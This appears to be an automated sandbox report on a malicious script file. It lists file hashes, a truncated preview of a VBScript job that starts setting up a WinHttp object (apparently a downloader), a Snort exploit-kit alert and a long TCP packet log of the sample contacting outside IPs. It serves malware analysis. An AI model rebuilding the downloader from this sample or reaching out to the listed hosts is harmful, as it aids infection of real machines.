SHA256:	962a366de507d99c19b1fa5c50ec27175334c7869d6a0344bff945b7d04a229f
SHA512:	bc4855064dd50f1ecf5523732dcbd4610a9ef33c1c3e66956222f18eeb84719727b2651bf5321c4ea1abae8978c682485a2e413db283028b6d5d95158bf974e9
SSDEEP:	12:QxofoXTdYrl3JRlM+dRl9lg3jRlOzUYlV9lb6zBYf8f10rInM:QxofwTu1G0X6FrY3bw+f8f108nM
TLSH:	B1014B1272FA1608A2B39B0D6B3200A40F3F7D169939D26C029C284E4FD3D81CC61BBB
File Content Preview:	..<.j.o.b. .i.d.=.".M.y.J.o.b.".>..... . .<.s.c.r.i.p.t. .l.a.n.g.u.a.g.e.=.".V.B.S.c.r.i.p.t.".>..... . . . . . .D.i.m. .c.y.t.o.p.l.a.s.m.a.,. .f.o.t.o.t.e.r.a.p.i.a..... . . . . . .S.e.t. .c.y.t.o.p.l.a.s.m.a. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.i.n.H.t

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/15/24-19:42:31.499875	TCP	2020423	ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1	80	49723	172.245.214.91	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 15, 2024 19:42:00.621498108 CET	49711	80	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:00.709644079 CET	80	49711	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:00.709762096 CET	49711	80	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:00.710088015 CET	49711	80	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:00.799263000 CET	80	49711	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:00.890531063 CET	80	49711	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:00.890558004 CET	80	49711	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:00.890705109 CET	49711	80	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:00.892199039 CET	49711	80	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:00.893209934 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:00.893265009 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:00.893348932 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:00.896007061 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:00.896023989 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.093064070 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.093373060 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:01.096302032 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:01.096312046 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.096674919 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.144093990 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:01.221462965 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:01.261898994 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.478672981 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.478740931 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.478781939 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.478874922 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.478914022 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.478934050 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:01.478941917 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.478997946 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:01.511981964 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.512087107 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.512128115 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.512180090 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:01.512187958 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.512214899 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:01.512236118 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:01.512278080 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:01.512660027 CET	49712	443	192.168.2.6	104.21.84.67
Feb 15, 2024 19:42:01.512670040 CET	443	49712	104.21.84.67	192.168.2.6
Feb 15, 2024 19:42:04.245835066 CET	49713	80	192.168.2.6	45.74.19.84
Feb 15, 2024 19:42:05.237879992 CET	49713	80	192.168.2.6	45.74.19.84
Feb 15, 2024 19:42:07.237862110 CET	49713	80	192.168.2.6	45.74.19.84
Feb 15, 2024 19:42:11.241710901 CET	49713	80	192.168.2.6	45.74.19.84
Feb 15, 2024 19:42:19.237904072 CET	49713	80	192.168.2.6	45.74.19.84
Feb 15, 2024 19:42:25.543361902 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:25.543386936 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:25.543464899 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:25.552556992 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:25.552571058 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:25.753046989 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:25.753128052 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:25.766026974 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:25.766055107 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:25.767008066 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:25.778940916 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:25.821907043 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.344228983 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.344357967 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.344448090 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.344456911 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.344486952 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.344535112 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.344583035 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.344750881 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.344795942 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.344809055 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.344904900 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.344955921 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.344964981 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.345041037 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.345094919 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.345102072 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.345186949 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.345246077 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.345254898 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.345339060 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.345382929 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.345390081 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.345484972 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.345534086 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.345542908 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.345643044 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.345696926 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.345704079 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.345801115 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.345839977 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.345848083 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.346081972 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.346136093 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.346143007 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.346220016 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.346267939 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.346273899 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.394160986 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.434112072 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.434309006 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.434362888 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.434380054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.434467077 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.434514046 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.434524059 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.434648991 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.434693098 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.434700966 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.434807062 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.434854031 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.434861898 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.434962034 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.435005903 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.435014009 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.435115099 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.435161114 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.435168982 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.435539007 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.435590982 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.435600042 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.435718060 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.435765028 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.435772896 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.435868979 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.435930967 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.435936928 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.435976982 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.436511040 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.436575890 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.436610937 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.436661005 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.436707020 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.436784983 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.437465906 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.437534094 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.437587976 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.437644958 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.438383102 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.438450098 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.438733101 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.438785076 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.439193964 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.439254045 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.478632927 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.478714943 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.523185015 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.523286104 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.523586035 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.523658991 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.523889065 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.523957968 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.524432898 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.524504900 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.524750948 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.524811983 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.525299072 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.525357962 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.525748968 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.525811911 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.526107073 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.526170969 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.526379108 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.526436090 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.526832104 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.526890039 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.527060986 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.527122974 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.527410030 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.527470112 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.527636051 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.527695894 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.527904987 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.527962923 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.528198957 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.528255939 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.528497934 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.528561115 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.528647900 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.528712988 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.528947115 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.529006004 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.529244900 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.529304028 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.529642105 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.529705048 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.530061960 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.530122042 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.530474901 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.530524015 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.530718088 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.530772924 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.531580925 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.531656027 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.531656981 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.531676054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.531707048 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.532135963 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.532187939 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.532198906 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.532250881 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.532422066 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.532480001 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.532543898 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.532589912 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.533345938 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.533401012 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.533574104 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.533621073 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.534857035 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.534868002 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.534899950 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.534928083 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.534934044 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.534951925 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.536214113 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.536241055 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.536263943 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.536271095 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.536295891 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.538034916 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.538059950 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.538132906 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.538140059 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.539664030 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.539690971 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.539750099 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.539756060 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.539774895 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.548449993 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.612591028 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.612662077 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.612711906 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.612725019 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.612736940 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.612768888 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.615614891 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.615663052 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.615686893 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.615695953 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.615714073 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.615734100 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.617537022 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.617587090 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.617614985 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.617621899 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.617650032 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.617664099 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.619036913 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.619091988 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.619117022 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.619124889 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.619159937 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.619179010 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.620559931 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.620604038 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.620635033 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.620640993 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.620666981 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.620686054 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.622683048 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.622735977 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.622756004 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.622764111 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.622787952 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.622802973 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.624413967 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.624473095 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.624490023 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.624496937 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.624527931 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.624546051 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.625948906 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.625993967 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.626017094 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.626023054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.626045942 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.626059055 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.627583981 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.627640009 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.627660990 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.627667904 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.627691984 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.627715111 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.628231049 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.628284931 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.628310919 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.628319025 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.628329039 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.628349066 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.629103899 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.629164934 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.629174948 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.629195929 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.629230022 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.629262924 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.629945040 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.629990101 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.630017996 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.630024910 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.630050898 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.630069017 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.630736113 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.630790949 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.630815029 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.630829096 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.630863905 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.630887985 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.632024050 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.632074118 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.632108927 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.632114887 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.632152081 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.632174969 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.633697033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.633744001 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.633780956 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.633790970 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.633826971 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.633852005 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.635108948 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.635164976 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.635199070 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.635205984 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.635236979 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.635258913 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.636878014 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.636923075 CET	443	49722	172.67.215.45	192.168.2.6
